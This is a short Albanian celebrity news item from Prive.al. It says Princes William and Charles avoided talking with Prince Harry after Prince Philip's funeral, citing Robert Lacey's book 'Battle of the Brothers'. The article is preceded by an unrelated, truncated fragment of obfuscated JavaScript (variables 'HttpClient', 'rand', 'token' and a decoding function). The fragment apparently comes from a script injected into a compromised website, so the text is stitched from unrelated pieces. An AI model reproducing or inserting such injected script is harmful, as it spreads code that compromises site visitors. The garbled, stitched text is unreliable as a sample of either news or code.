;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Princi William dhe Harry nuk flasin me njëri tjetrin

By

Princi William dhe Kate Middleton, nuk kanë më biseda me Princin Harry, pas varrimit të Princit Philip sepse kishin frikë se do të dilnin detaje nga shtëpia mbretërore.

Treshja u pa duke ecur, dhe duke biseduar së bashku për disa minuta, derisa u larguan nga varrimi i gjyshit të tyre në muajin prill.

Në atë kohë besohej që vëllezërit biseduan me njëri-tjetrin, dhe me babanë e tyre Princin Charles me shpresën për të ndrequr marrëdhëniet pas intervistës bombë të Princit Harry dhe Meghan me Oprah Winfrey, raporton Daily Mail.

Mirëpo, historiani kryesor i familjes mbretërore Robert Lacey, tha se biseda nuk u zhvillua sepse William dhe Princi Charles ishin të shqetësuar se biseda e tyre do të dilte në pah.

Në librin i cili po realizohet nga Robert Lacey “Battle of the Brothers”, ai shkroi: William dhe Charles, u thanë miqve se nuk shohin asnjë kuptim të flasin me Harry, pasi që çdo diskutim i tyre do të zbulohet nga Oprah Winfrey. /Prive.al

Artikuj të ngjashëm